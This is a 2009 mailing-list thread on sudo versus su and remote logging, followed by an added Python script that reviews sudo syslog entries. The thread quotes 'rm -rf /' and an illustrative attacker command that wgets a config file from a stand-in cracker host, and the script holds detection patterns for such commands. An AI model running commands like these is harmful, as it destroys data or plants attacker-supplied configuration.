[Leaplist] sudo vs su

Kevin Korb kmk at sanitarium.net
Mon Jun 1 13:44:30 EDT 2009


The www user has su or sudo access?  That would be a pretty horrible idea.

Richard F. Ostrow Jr. wrote:
> Jim,
> 
> For whatever reason, I never got your post (taken from Kevin's reply).
> 
> At any rate, as far as remote logging goes, it's more than just to track
> what you or your authorized users are doing - it's for tracking what
> remote attackers are doing and preventing them from covering their tracks.
> Sure, you probably wouldn't do anything as stupid as an "rm -rf /"... but
> would you do a "cd /usr/local/etc/apache2/ && wget
> http://somecracker.net/compromisedapacheconfs/httpd.conf &&
> /usr/local/etc/rc.d/apache2 restart"? You may not even see it happen.
> Granted, you probably wouldn't even with remote logging (unless you
> regularly check), but they can always wipe their activity from the log.
> 
> I state this because I was recently compromised with a 2-month old build
> of apache2. The hackers were not very sophisticated (did not cover their
> tracks), and never got root access (everything was done as www user), but
> it got me thinking about securing my boxes and how to adapt to various
> attacks (like locking out an IP address at the firewall level at a single
> failed SSH login - prevents brute force attacks, and if I lock myself out,
> I login from another server somewhere (sf.net, for instance) and reset
> it). It also tends to block people who inadvertently became a part of bot
> nets or similar when I get distributed brute force attacks (my logs do
> show as much, as I had at one point 250 login attempts for a single
> (nonexistent) user from 250 different IP addresses in under 1 minute). I
> also lock IP addresses out for other abuses (excessive connection attempts
> on any port, for instance... haven't gotten into trouble with this one
> (yet)).
> 
> Jim Hartley wrote:
>> Remote logging system???? I don't have a remote logging system. I have
>> just my one desktop machine here. In that context, does "sudo" have any
>> advantages? I am assuming that **I** am not going to do something stupid
>> like "rm -rf /"
>>
>> Jim Hartley
>>
>> Richard F. Ostrow Jr. wrote:
>>> Ok, now that we're actually talking in the right topic, here's the
>>> _correct_ answer.
>>>
>>> su - input not logged, difficult to backtrace what was done in the
>>> event of a catastrophic screwup (rm -rf /)
>>>
>>> sudo - can easily track what was done. Everything put into sudo goes
>>> into /var/log/{hostname}/messages of the remote logging system. An
>>> 'rm -rf /' would be logged on the remote machine, and I would know
>>> *exactly* who was stupid enough to do such a thing, and can make them
>>> clean up the mess.
>>>
>>> I wonder which one is better from an SA standpoint?
>>>
>>>
> 

-- 
~*-,._.,-*~'`^`'~*-,._.,-*~'`^`'~*-,._.,-*~'`^`'~*-,._.,-*~'`^`'~*-,._.,-*~
	Kevin Korb			Phone:    (407) 252-6853
	Systems Administrator		Internet:
	FutureQuest, Inc.		Kevin at FutureQuest.net  (work)
	Orlando, Florida		kmk at sanitarium.net (personal)
	Web page:			http://www.sanitarium.net/
	PGP public key available on web site.
~*-,._.,-*~'`^`'~*-,._.,-*~'`^`'~*-,._.,-*~'`^`'~*-,._.,-*~'`^`'~*-,._.,-*~
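The thread's argument for sudo is that every invocation reaches the remote log server as "who ran what, as whom", and refusals (wrong password, user not in sudoers) are logged the same way. The script below is an added example, not code from the list or its posters: it parses sudo's syslog message layout and flags the cases the thread worries about (a destructive command, a refused attempt, and a daemon account such as www touching sudo at all). The sample log lines, the service-account set and the command watch list are constructed for illustration.

```python
"""Review sudo entries as they would arrive on a remote syslog server.
Added example (not the list's code); sample lines and watch lists are constructed."""
import re

# Message layout sudo writes to syslog; refusals insert a reason before TTY=
# ("user NOT in sudoers", "3 incorrect password attempts").
SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sudo:\s+(?P<user>\S+) :"
    r"(?: (?P<reason>[^;]+?) ;)? TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)

SERVICE_ACCOUNTS = {"www", "nobody"}          # assumed: accounts that should never hold sudo rights
DESTRUCTIVE = [                               # assumed watch list, extend per site
    re.compile(r"^/bin/rm -rf /(\s|$)"),
    re.compile(r"^/usr/(local/)?bin/(wget|curl|fetch)\b"),
]

# Constructed sample of what a remote log server might receive from host web1.
SAMPLE_LOG = """\
Jun  1 13:40:02 web1 sudo:      kmk : TTY=pts/0 ; PWD=/home/kmk ; USER=root ; COMMAND=/usr/sbin/apachectl graceful
Jun  1 13:41:17 web1 sudo:      kmk : TTY=pts/0 ; PWD=/home/kmk ; USER=root ; COMMAND=/bin/rm -rf /
Jun  1 13:42:05 web1 sudo:      www : user NOT in sudoers ; TTY=unknown ; PWD=/usr/local/www ; USER=root ; COMMAND=/usr/bin/wget http://example.invalid/httpd.conf
Jun  1 13:43:30 web1 sshd[2231]: Failed password for invalid user oracle from 192.0.2.10 port 40122 ssh2
Jun  1 13:44:30 web1 sudo:      bob : 3 incorrect password attempts ; TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/bin/sh
"""


def parse_sudo_line(line):
    """Return a dict of the sudo fields, or None for non-sudo lines."""
    m = SUDO_RE.match(line)
    return m.groupdict() if m else None


def review(lines):
    """Return one alert per suspicious sudo entry: (ts, user, cmd, [flags])."""
    alerts = []
    for line in lines:
        rec = parse_sudo_line(line)
        if rec is None:
            continue
        flags = []
        if rec["reason"]:                      # sudo refused: auth failure or not in sudoers
            flags.append("refused: " + rec["reason"])
        if rec["user"] in SERVICE_ACCOUNTS:    # a daemon account even trying sudo is a compromise signal
            flags.append("service account invoked sudo")
        if any(p.search(rec["cmd"]) for p in DESTRUCTIVE):
            flags.append("destructive command")
        if flags:
            alerts.append((rec["ts"], rec["user"], rec["cmd"], flags))
    return alerts
```

Run `review(SAMPLE_LOG.splitlines())` against the constructed sample to see the three entries that merit a look; the successful `apachectl graceful` and the unrelated sshd line are passed over.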
